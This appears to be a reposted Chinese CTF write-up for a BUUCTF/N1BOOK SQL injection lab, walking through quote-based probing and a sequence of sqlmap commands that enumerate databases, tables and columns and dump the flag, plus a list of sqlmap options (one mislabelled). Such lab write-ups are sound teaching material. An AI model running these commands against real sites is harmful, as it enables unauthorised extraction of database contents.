[Python知识库] [BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> Python知识库 -> [BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用 -> 正文阅读

[Python知识库][BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用

[第一章 web入门]SQL注入-1 及sqlmap的简单使用

跟着题目来学习一下sqlmap的简单使用

首先?id=1是如下结果

id=1’

id=1’’

判断存在注入点，这里直接展示sqlmap

1、判断是否存在注入点

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1

2、查看所有数据库

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 --dbs

3、查看数据中的列表

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D mysql -tables

4、查看列表中的字段

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns

5、查看字段的内容

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C fllllag --dump

6、然后还有一些其他的

-p 指定测试参数
-b 获取banner
--is-dba 是否为管理员权限
--current-user 查看当前数据库
--current-user 查看当前用户
--count 检索所有数据数量
--level 测试等级（1-5）默认为1
-v 显示详细信息
-D 指定数据库
-T 指定表
-C 指定列
（大写）

DBA：True表示是管理员权限